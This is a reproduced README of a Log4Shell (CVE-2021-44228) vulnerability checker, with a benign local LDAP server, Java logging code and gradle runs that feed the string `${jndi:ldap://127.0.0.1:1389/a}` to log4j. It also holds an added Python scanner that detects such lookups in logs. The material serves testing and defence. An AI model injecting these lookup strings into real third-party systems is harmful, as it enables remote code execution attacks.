Related vulnerability
Description
Vulnerability CVE-2021-44228 checker
Introduction
# CVE-2021-44228 checker
This is the repository for checking for vulnerability [CVE-2021-44228](https://access.redhat.com/security/cve/cve-2021-44228).
**This is a PoC that only displays strings without any external class loading. It cannot be used for arbitrary code execution.**
## How does it work?
### Step 1: Run the server application
The image `ghcr.io/greymd/cve-2021-44228/server` is available and can be run on Docker.
```
$ docker run -p 1389:1389 -t ghcr.io/greymd/cve-2021-44228/server
```
### Step 2: Access the endpoint with log4j
Prepare some code that writes a log entry with log4j and run it on the same host.
Make it log the string `${jndi:ldap://127.0.0.1:1389/a}`.
```java
package logger;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class App {
    private static final Logger logger = LogManager.getLogger(App.class);

    public static void main(String[] args) {
        // Logging a JNDI lookup string triggers the lookup on a vulnerable log4j.
        logger.error("${jndi:ldap://127.0.0.1:1389/a}");
    }
}
```
If the logged argument triggers the vulnerability, the phrase 「うんこもりもり」 (which roughly means "Lots of shit.") will be logged instead of the original string.
```
17:52:24.871 [main] ERROR logger.App -
"mm
mmmm "m "mmmmm
"" # m" "
# m#m m
# m" # m "m m
m" m" "mm" """""
m m m m m m
mm# # # "m mm# # # "m
m"#" ## # m"#" ## #
""#mm "m # # ""#mm "m # #
# # # # # #
"mm" m" "mm" m"
```
If you don't want to write and build your own code, you can use the simple logger application in this repository.
Its first argument is written out by the Logger.
```
$ git clone https://github.com/greymd/CVE-2021-44228.git
$ cd CVE-2021-44228/logger
$ ./gradlew run --args='Hello'
︙
> Task :run
22:10:02.307 [main] ERROR logger.App - Hello
```
An example of passing an argument that triggers the vulnerability:
```
$ ./gradlew run --args='${jndi:ldap://127.0.0.1:1389/a}'
︙
> Task :run
22:10:34.757 [main] ERROR logger.App -
"mm
mmmm "m "mmmmm
"" # m" "
# m#m m
# m" # m "m m
m" m" "mm" """""
m m m m m m
mm# # # "m mm# # # "m
m"#" ## # m"#" ## #
""#mm "m # # ""#mm "m # #
# # # # # #
"mm" m" "mm" m"
```
If you have a version of log4j that is NOT affected by the vulnerability, **or the server application is not running**, the string will be output as is without any modification. You can verify this by updating the version of the logger application as shown below.
```
$ sed -i.bak s/2.14.1/2.15.0/ build.gradle
$ ./gradlew run --args='${jndi:ldap://127.0.0.1:1389/a}'
> Task :run
22:12:50.913 [main] ERROR logger.App - ${jndi:ldap://127.0.0.1:1389/a}
```
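A defender-side companion to the check above, added here and not part of the original repository: it scans log4j-formatted log lines for literal `${jndi:...}` lookups (the form a patched log4j writes verbatim, as in the output just shown) and encodes the README's vulnerable-or-not comparison as a function. The log lines and the 198.51.100.7 address are constructed samples.

```python
import re
from typing import List, NamedTuple, Optional

# Pattern for a log4j JNDI lookup of the shape ${jndi:<scheme>://<host>[:<port>]<path>}
# (the README's trigger string is ${jndi:ldap://127.0.0.1:1389/a}). Case-insensitive,
# since log4j matches lookup prefixes case-insensitively.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z][a-z0-9+.-]*)\s*://"
    r"(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)


class JndiHit(NamedTuple):
    line_no: int
    scheme: str
    host: str
    port: Optional[int]
    raw: str


def find_jndi_lookups(lines: List[str]) -> List[JndiHit]:
    """Return every literal ${jndi:...} lookup found in the given log lines.

    A literal hit means the lookup was NOT resolved (patched log4j or lookups
    disabled); on a vulnerable host the literal disappears from the log, so an
    empty result does not prove that nothing was attempted.
    """
    hits: List[JndiHit] = []
    for line_no, line in enumerate(lines, start=1):
        for m in JNDI_LOOKUP.finditer(line):
            port = int(m.group("port")) if m.group("port") else None
            hits.append(JndiHit(line_no, m.group("scheme").lower(), m.group("host"), port, m.group(0)))
    return hits


def lookup_was_resolved(message: str, logged: str) -> bool:
    """The README's by-eye check: a vulnerable log4j resolves the lookup before writing
    the line, so the logged text differs from the message; a patched one logs it verbatim."""
    return message != logged


# Constructed sample log lines in the README's log4j layout (not real output).
SAMPLE_LOG = [
    "22:10:02.307 [main] ERROR logger.App - Hello",
    "22:12:50.913 [main] ERROR logger.App - ${jndi:ldap://127.0.0.1:1389/a}",
    "22:13:01.004 [main] INFO  logger.App - ua=${JNDI:LDAP://198.51.100.7/x}",
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.scheme}://{hit.host}:{hit.port} ({hit.raw})")
```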
### Run the server application without Docker
```
$ git clone https://github.com/greymd/CVE-2021-44228.git
$ cd CVE-2021-44228/server
$ ./gradlew run
︙
Listening ...
```
## Motivation
As mentioned above (and as far as I have investigated), this vulnerability cannot be reproduced unless the JNDI destination server is running. Therefore, a simple PoC is useful.
## References
The following URLs were used for reference in the implementation.
* https://www.lunasec.io/docs/blog/log4j-zero-day/
* https://github.com/mbechler/marshalsec
* https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
* https://github.com/apache/logging-log4j2/pull/608
* https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept
## Tested versions
* `OpenJDK Runtime Environment (build 1.8.0_302-b08)`
* `OpenJDK Runtime Environment Corretto-11.0.12.7.1 (build 11.0.12+7-LTS)`
* `OpenJDK Runtime Environment Zulu17.30+15-CA (build 17.0.1+12-LTS)`
File snapshot
```
[4.0K] /data/pocs/9ec4ed20567c356d0379468b0bfdeed93cfa0f68
├── [4.0K] logger
│   ├── [ 396] build.gradle
│   ├── [4.0K] gradle
│   │   └── [4.0K] wrapper
│   │       ├── [ 58K] gradle-wrapper.jar
│   │       └── [ 202] gradle-wrapper.properties
│   ├── [7.9K] gradlew
│   ├── [2.6K] gradlew.bat
│   ├── [ 355] settings.gradle
│   └── [4.0K] src
│       └── [4.0K] main
│           └── [4.0K] java
│               └── [4.0K] logger
│                   └── [ 329] App.java
├── [4.0K] README.md
└── [4.0K] server
    ├── [ 246] build.gradle
    ├── [ 501] deploy.sh
    ├── [ 321] Dockerfile
    ├── [4.0K] gradle
    │   └── [4.0K] wrapper
    │       ├── [ 58K] gradle-wrapper.jar
    │       └── [ 202] gradle-wrapper.properties
    ├── [7.9K] gradlew
    ├── [2.6K] gradlew.bat
    ├── [  94] Makefile
    ├── [ 355] settings.gradle
    └── [4.0K] src
        └── [4.0K] main
            └── [4.0K] java
                └── [4.0K] server
                    └── [3.8K] App.java

14 directories, 18 files
```
Notes
1. It is recommended to access the original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.